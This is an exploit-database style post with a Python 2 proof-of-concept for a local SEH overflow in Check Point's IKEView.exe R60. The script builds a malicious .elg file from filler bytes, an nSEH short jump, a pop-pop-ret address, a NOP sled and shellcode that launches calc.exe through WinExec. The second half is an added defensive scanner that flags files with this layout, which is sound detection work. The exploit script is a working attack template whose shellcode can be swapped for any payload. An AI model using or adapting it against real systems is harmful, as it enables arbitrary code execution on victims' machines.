IKEView.exe R60 - .elg Local SEH Exploit
Source: cor3sm4sh3r[at]gmail.com   Author: cor3sm4sh3r   Published: 2015-09-18
# Exploit Title: IKEView.exe R60 Local SEH Exploit
# Date: 17/09/2015
# Exploit Author: cor3sm4sh3r
# Author email: cor3sm4sh3r[at]gmail.com
# Contact: https://in.linkedin.com/pub/shravan-kumar-ceh-oscp/103/414/450
# Category: Local
#[+] Gr337z: hyp3rlinx for finding the bug
#[+] Source:
#http://hyp3rlinx.altervista.org/advisories/AS-IKEVIEWR60-0914.txt
# exploit has been tested on win XP professional sp2
#Vendor:
#================================
#www.checkpoint.com
#http://pingtool.org/downloads/IKEView.exe
#!/usr/bin/env python
# Python 2 script: writes the crafted IKEView.elg that triggers the SEH overwrite
file="IKEView.elg"
x=open(file,"wb")  # binary mode so no byte of the payload is translated on Windows
nseh = "\x90\x90\xeb\x32" #short jump
seh = "\xc0\x28\x40\x00" #pop pop ret
nopsled = "\x90"*50
#badchars += "\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
buf = "\x33\xc0" #=> XOR EAX,EAX | Zero out EAX register
buf += "\x50" #=> PUSH EAX | Push EAX to have null-byte padding for "calc.exe"
buf += "\x68\x2E\x65\x78\x65" #=> PUSH ".exe" | Push The ASCII string to the stack
buf += "\x68\x63\x61\x6C\x63" #=> PUSH "calc" |
buf += "\x8B\xC4" #=> MOV EAX,ESP | Put a pointer to the ASCII string in EAX
buf += "\x6A\x01" #=> PUSH 1 | Push uCmdShow parameter to the stack
buf += "\x50" #=> PUSH EAX | Push the pointer to lpCmdLine to the stack
buf += "\xBB\x4d\x11\x86\x7C" #=> MOV EBX,7C86114d | Move the pointer to WinExec() into EBX
buf += "\xFF\xD3" #=> CALL EBX
buf += "\x33\xc0" #=> XOR EAX,EAX | Zero out EAX register
buf += "\x50" #=> PUSH EAX | Push EAX
buf += "\xBB\xa2\xca\x81\x7c" #=> MOV EBX,7C81caa2 | Exit process
buf += "\xFF\xD3" #=> CALL EBX
junk = "A"*(4424)
payload = junk + nseh + seh + nopsled + buf
x.write(payload)
x.close()
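The PoC above has a very recognisable shape: a long run of a single filler byte, a 4-byte nSEH slot holding a short jump (EB xx), a 4-byte handler address, then a NOP sled and the stage. The following added example (not part of the original advisory or PoC, and not Check Point's or the author's code) is a defender-side heuristic that scans a file for exactly that shape, so a suspicious .elg dropped beside IKEView.exe can be flagged before it is opened. The thresholds, the function names and the two sample files are assumptions constructed for the example.

```python
# Added example (not from the original PoC): a heuristic scanner for files
# shaped like an SEH-overwrite payload. Thresholds and samples are assumptions.

def longest_byte_run(data):
    """Return (byte, run_length, start_offset) for the longest run of one byte."""
    best = (None, 0, 0)
    if not data:
        return best
    cur_byte, cur_len, cur_start = data[0], 1, 0
    for i in range(1, len(data)):
        if data[i] == cur_byte:
            cur_len += 1
        else:
            if cur_len > best[1]:
                best = (cur_byte, cur_len, cur_start)
            cur_byte, cur_len, cur_start = data[i], 1, i
    if cur_len > best[1]:
        best = (cur_byte, cur_len, cur_start)
    return best


def inspect_elg(data, min_run=1024, sled_min=16):
    """Return indicators for an SEH-overwrite-shaped file.

    A hit needs all three: a filler run of at least min_run bytes, a short-jump
    opcode (0xEB) inside the 4 bytes right after it (the nSEH slot), and a NOP
    sled of at least sled_min bytes after the 8-byte nSEH+SEH pair.
    """
    filler, run_len, run_start = longest_byte_run(data)
    after = data[run_start + run_len:]
    findings = {
        "filler_run": run_len,
        "short_jump_after_run": False,
        "nop_sled_len": 0,
        "suspicious": False,
    }
    if run_len >= min_run:
        # nSEH: 2-byte short jump somewhere in the first 4 bytes after the filler
        findings["short_jump_after_run"] = any(
            after[i] == 0xEB for i in range(min(3, len(after)))
        )
        # NOP sled (0x90 run) after the nSEH + SEH pair
        tail = after[8:]
        sled = best_sled = 0
        for b in tail:
            sled = sled + 1 if b == 0x90 else 0
            best_sled = max(best_sled, sled)
        findings["nop_sled_len"] = best_sled
    findings["suspicious"] = (
        run_len >= min_run
        and findings["short_jump_after_run"]
        and findings["nop_sled_len"] >= sled_min
    )
    return findings


# Constructed samples (not real IKEView files). The handler address is left as
# zero bytes on purpose; only the layout matters to the heuristic.
BENIGN_SAMPLE = b"IKEView log\n" + b"Sent packet 1\nRecv packet 1\n" * 200
PAYLOAD_SHAPED_SAMPLE = (
    b"A" * 4424                 # filler
    + b"\x90\x90\xeb\x32"       # nSEH slot with a short jump
    + b"\x00\x00\x00\x00"       # SEH slot (placeholder)
    + b"\x90" * 50              # NOP sled
    + b"\xcc" * 20              # stand-in for the stage
)

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_SAMPLE), ("payload-shaped", PAYLOAD_SHAPED_SAMPLE)):
        print(name, inspect_elg(sample))
```

Run it against any .elg found next to the binary; a run of thousands of identical bytes is already abnormal for a log file, and the extra nSEH and sled checks keep a merely padded file from firing the rule.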